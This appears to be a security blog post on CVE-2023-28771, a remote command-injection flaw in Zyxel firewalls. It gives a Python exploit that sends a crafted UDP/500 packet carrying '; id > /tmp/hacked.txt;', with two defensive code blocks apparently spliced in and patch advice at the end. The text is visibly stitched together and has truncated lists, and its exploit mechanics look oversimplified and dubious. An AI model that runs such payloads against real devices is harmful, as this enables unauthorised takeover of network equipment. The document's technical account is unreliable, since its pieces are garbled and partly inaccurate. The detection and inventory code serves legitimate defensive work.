
CVE-2023-28771 is a critical security vulnerability discovered in several Zyxel firewall products, including the ZyWALL/USG, VPN, USG FLEX, and ATP series, across multiple firmware versions. In this long read, we break down what happened, why it’s dangerous, how attackers can exploit it (with code example), and what you should do next.

What is CVE-2023-28771?

This vulnerability is related to improper error message handling. Specifically, affected Zyxel devices do not properly validate certain packets, which can allow an attacker to execute operating system (OS) commands remotely — without needing to log in.

Affected Devices & Versions

- ZyWALL/USG series: firmware 4.60 through 4.73
- ATP series: firmware 4.60 through 5.35
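The ranges above are the first thing to check against a device inventory. The following Python helper is an added example (not from Zyxel or from the original post) that parses firmware version strings and reports which devices fall inside the affected ranges this page lists. It assumes versions are written as "major.minor" with a two-digit minor, as the page does, optionally with a leading "V" and a build suffix in parentheses; the VPN and USG FLEX series are named as affected above but no ranges are given for them here, so such devices are reported as "unknown" rather than guessed.

```python
from typing import Dict, Iterable, List, Optional, Tuple

# Affected firmware ranges exactly as listed on this page (inclusive).
# Series not listed here (e.g. VPN, USG FLEX) cannot be judged from the page alone.
AFFECTED: Dict[str, Tuple[Tuple[int, int], Tuple[int, int]]] = {
    "ZyWALL/USG": ((4, 60), (4, 73)),
    "ATP": ((4, 60), (5, 35)),
}


def parse_version(text: str) -> Tuple[int, int]:
    """Turn '4.73', 'V4.73' or 'V4.73(AAPL.1)' into (4, 73).

    The '(...)' build suffix form is an assumption about how versions are written
    in an inventory; the page itself only shows the bare 'major.minor' form, with the
    minor part written as two digits (so '4.7' is NOT treated as '4.70').
    """
    core = text.strip().lstrip("Vv").split("(", 1)[0]
    major, minor = core.split(".", 1)
    return int(major), int(minor)


def is_affected(series: str, firmware: str) -> Optional[bool]:
    """True/False when the page lists a range for the series, None when it does not."""
    rng = AFFECTED.get(series)
    if rng is None:
        return None
    low, high = rng
    return low <= parse_version(firmware) <= high


def triage_inventory(devices: Iterable[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Sort (hostname, series, firmware) records into patch / ok / unknown buckets."""
    result: Dict[str, List[str]] = {"patch": [], "ok": [], "unknown": []}
    for host, series, firmware in devices:
        verdict = is_affected(series, firmware)
        if verdict is None:
            result["unknown"].append(host)   # series not covered by the page's ranges
        elif verdict:
            result["patch"].append(host)     # inside an affected range: update now
        else:
            result["ok"].append(host)        # outside the listed range
    return result


# Constructed sample inventory (hostnames and versions are made up for illustration).
INVENTORY = [
    ("fw-hq", "ZyWALL/USG", "V4.73(AAPL.1)"),   # top of the affected range
    ("fw-branch", "ATP", "5.36"),                # one minor above the ATP range
    ("fw-lab", "ATP", "4.60"),                   # bottom of the affected range
    ("fw-dc", "USG FLEX", "5.30"),               # series without a range on this page
    ("fw-old", "ZyWALL/USG", "4.59"),            # below the listed range
]

if __name__ == "__main__":
    for bucket, hosts in triage_inventory(INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Treat "unknown" as work to do, not as safe: it only means the page gives no range for that series, so the vendor advisory has to be consulted for it.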

For Zyxel’s official report, see:  
Zyxel Security Advisory for CVE-2023-28771

Why is this Such a Big Deal?

In plain terms: attackers can remotely take control of your device. They don’t need a password and they don’t need to be inside your network. All they need is for the device’s services (like IPSec VPN) to be exposed to the internet. With that control, an attacker can:

- Launch attacks on your internal network or the wider internet

Proof: In June 2023, the Shadowserver Foundation and Rapid7 both reported active, widespread exploitation of this vulnerability.

How Does the Exploit Work?

This issue involves the way Zyxel firewalls process some types of IPSec VPN (Internet Protocol Security Virtual Private Network) packets. By sending a specially crafted UDP packet to port 500 (the port used for IKE key exchange), an attacker can make the firewall run arbitrary commands as the account the packet-handling service runs under, usually one with the highest privileges on the device.

Technical Details

The vulnerable process is related to the internet service daemon (zyshd), which listens for these packets. The attacker sends a manipulated packet. Because of the weak error handling, the device treats parts of the packet as system commands and runs them.

Exploit Example

To show just how easy it is, here’s a basic Python example for sending a malicious packet. (Warning: This is for educational purposes ONLY. Do not attack any networks you don’t own!)

Python Code to Exploit CVE-2023-28771

import socket

# Target Zyxel device IP
target_ip = "192.168.1.1"
target_port = 500  # UDP port for IKE/IKEv2

# Replace this with your system command (e.g., 'id', 'reboot', etc.)
command_to_execute = "; id > /tmp/hacked.txt;"

# This is a minimal packet. Actual exploits may craft the payload for the specific protocol, but the vulnerability parses certain fields and unsafely executes your string.
exploit_payload = b"\x00" * 100 + command_to_execute.encode()

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
    sock.sendto(exploit_payload, (target_ip, target_port))

print("Exploit sent. Your command should execute if the device is vulnerable.")

What does this code do?

- Sends a UDP packet to the device’s port 500 (used for VPN/IKE)
- The payload ends with a command injection string (; id > /tmp/hacked.txt;)
- If successful, the device will run this Linux command and save the output of id into /tmp/hacked.txt — proving remote command execution.
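From the defender's side, the useful observation in the two sections above is that a packet like this does not look like IKE at all: the first 28 bytes of every IKEv1/IKEv2 message form a fixed ISAKMP header (RFC 7296 section 3.1) with a non-zero initiator SPI, a version byte of 0x10 or 0x20 and a length field equal to the whole message, and the payloads are binary structures, not shell text. The following Python is an added example (not from the original post, Zyxel, Rapid7 or Shadowserver) that applies those sanity checks to captured UDP/500 datagrams, so that traffic of the shape shown in the code above can be flagged in a packet capture or a custom sensor. The sample datagrams and finding codes are constructed for the example.

```python
import struct

IKE_HEADER_LEN = 28                      # fixed ISAKMP/IKEv2 header size (RFC 7296 section 3.1)
SHELL_METACHARS = frozenset(b";|&`$<>")  # bytes that have no business inside binary IKE payloads
MIN_TEXT_RUN = 8                         # shorter printable runs are normal (vendor IDs, etc.)


def _suspicious_text_runs(body: bytes) -> list:
    """Return printable-ASCII runs in the body that contain shell metacharacters."""
    runs, current = [], bytearray()
    for b in body + b"\x00":             # trailing sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            current.append(b)
            continue
        if len(current) >= MIN_TEXT_RUN and SHELL_METACHARS & set(current):
            runs.append(bytes(current).decode("ascii"))
        current = bytearray()
    return runs


def inspect_ike_datagram(data: bytes) -> list:
    """Return finding codes for one UDP/500 payload; an empty list means it looks like ordinary IKE."""
    if len(data) < IKE_HEADER_LEN:
        return ["runt"]                  # cannot even hold the fixed header
    (init_spi, _resp_spi, _next_payload, version, _exch_type,
     _flags, _msg_id, length) = struct.unpack("!QQBBBBII", data[:IKE_HEADER_LEN])
    findings = []
    if init_spi == 0:
        findings.append("zero-initiator-spi")   # RFC 7296: the initiator SPI MUST NOT be zero
    if (version >> 4) not in (1, 2):
        findings.append("bad-major-version")    # only IKEv1 (0x10) and IKEv2 (0x20) exist
    if length != len(data):
        findings.append("length-mismatch")      # header length must equal the whole message
    for run in _suspicious_text_runs(data[IKE_HEADER_LEN:]):
        findings.append("shell-text:" + run)    # shell-looking text where binary payloads belong
    return findings


# Constructed sample 1: a plausible IKEv2 IKE_SA_INIT request header (next payload 33 = SA,
# exchange type 34, Initiator flag set) followed by an 8-byte placeholder body.
_BODY = b"\x00" * 8
SANE_IKE = struct.pack("!QQBBBBII", 0x1122334455667788, 0, 33, 0x20, 34, 0x08, 0,
                       IKE_HEADER_LEN + len(_BODY)) + _BODY

# Constructed sample 2: the shape of the payload shown on this page (null padding, then shell text).
PAGE_SHAPE = b"\x00" * 100 + b"; id > /tmp/hacked.txt;"

# Constructed sample 3: a truncated datagram.
RUNT = b"\x00" * 10

if __name__ == "__main__":
    for name, datagram in (("sane", SANE_IKE), ("page-shape", PAGE_SHAPE), ("runt", RUNT)):
        print(name, "->", inspect_ike_datagram(datagram) or "looks like IKE")
```

Any one of these findings is a reason to look at the source address; all of them together on a single datagram to a Zyxel VPN endpoint is the kind of event worth an alert. Note that NAT-T traffic on UDP/4500 carries a 4-byte non-ESP marker before the header, so the same checks there need a 4-byte offset.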

Attackers can also disrupt businesses and homes with remote reboots or configuration modifications. In May and June 2023, security researchers observed scanning and mass attacks across large IP address blocks. Unsuspecting businesses saw their firewall controls disabled and their network traffic rerouted by hackers.

References & Further Reading

- Rapid7 Analysis: CVE-2023-28771
- Shadowserver Detection Report
- Original Zyxel Security Advisory
- CVE Details for CVE-2023-28771

Update NOW!

Go to Zyxel’s support page and download the latest firmware for your model.

Restrict VPN Services:

- Don’t expose UDP/500 or VPN services directly to the public internet unless mandatory.

In Summary

CVE-2023-28771 is a major threat for anyone running Zyxel firewalls with affected firmware. Attackers only need network access, and with a simple malicious packet, they can take over your security device.  
Patch your systems immediately, block public access to management ports and VPN services, and always watch for security updates from your vendors.


Stay safe! If you found this tip useful, consider sharing with your IT friends or colleagues.  
For more technical background, check the references above or follow security blogs for the latest attack trends.

Timeline

Published on: 04/25/2023 02:15:00 UTC
Last modified on: 05/04/2023 18:46:00 UTC